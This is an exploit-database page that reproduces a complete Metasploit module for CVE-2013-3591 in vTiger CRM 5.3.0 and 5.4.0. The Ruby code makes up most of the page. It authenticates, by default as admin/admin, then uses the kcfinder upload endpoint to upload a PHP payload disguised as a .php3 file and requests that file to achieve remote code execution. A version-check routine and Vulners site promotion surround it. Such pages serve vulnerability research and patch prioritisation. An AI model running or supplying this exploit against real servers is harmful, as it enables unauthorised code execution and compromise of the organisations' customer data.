Vulners
Lucene search
vTigerCRM 5.3.0 5.4.0 - Authenticated Remote Code Execution
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution',
'Description' => %q{
vTiger CRM allows an authenticated user to upload files to embed within documents.
Due to insufficient privileges on the 'files' upload folder, an attacker can upload a PHP
script and execute aribtrary PHP code remotely.
This module was tested against vTiger CRM v5.4.0 and v5.3.0.
},
'Author' =>
[
'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-3591'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'BadChars' => "&\n=+%",
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 30 2013'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin'])
], self.class)
end
def check
res = nil
begin
res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/index.php') })
rescue
print_error("Unable to access the index.php file")
return CheckCode::Unknown
end
if res and res.code != 200
print_error("Error accessing the index.php file")
return CheckCode::Unknown
end
if res.body =~ /<div class="poweredBy">Powered by vtiger CRM - (.*)<\/div>/i
print_status("vTiger CRM version: " + $1)
case $1
when '5.4.0', '5.3.0'
return CheckCode::Vulnerable
else
return CheckCode::Safe
end
end
return CheckCode::Unknown
end
def exploit
init = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/index.php')
})
sess = init.get_cookies
post = {
'module' => 'Users',
'action' => 'Authenticate',
'return_module' => 'Users',
'return_action' => 'Login',
'user_name' => datastore['USERNAME'],
'user_password' => datastore['PASSWORD']
}
login = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/index.php'),
'vars_post' => post,
'cookie' => sess
})
fname = rand_text_alphanumeric(rand(10)+6) + '.php3'
cookies = login.get_cookies
php = %Q|<?php #{payload.encoded} ?>|
data = Rex::MIME::Message.new
data.add_part(php, 'application/x-php', nil, "form-data; name=\"upload\"; filename=\"#{fname}\"");
data.add_part('files', nil, nil, 'form-data; name="dir"')
data_post = data.to_s
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/kcfinder/browse.php?type=files&lng=en&act=upload'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data_post,
'cookie' => cookies
})
if res and res.code == 200
print_status("Triggering payload...")
send_request_raw({'uri' => datastore["TARGETURI"] + "/test/upload/files/#{fname}"}, 5)
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1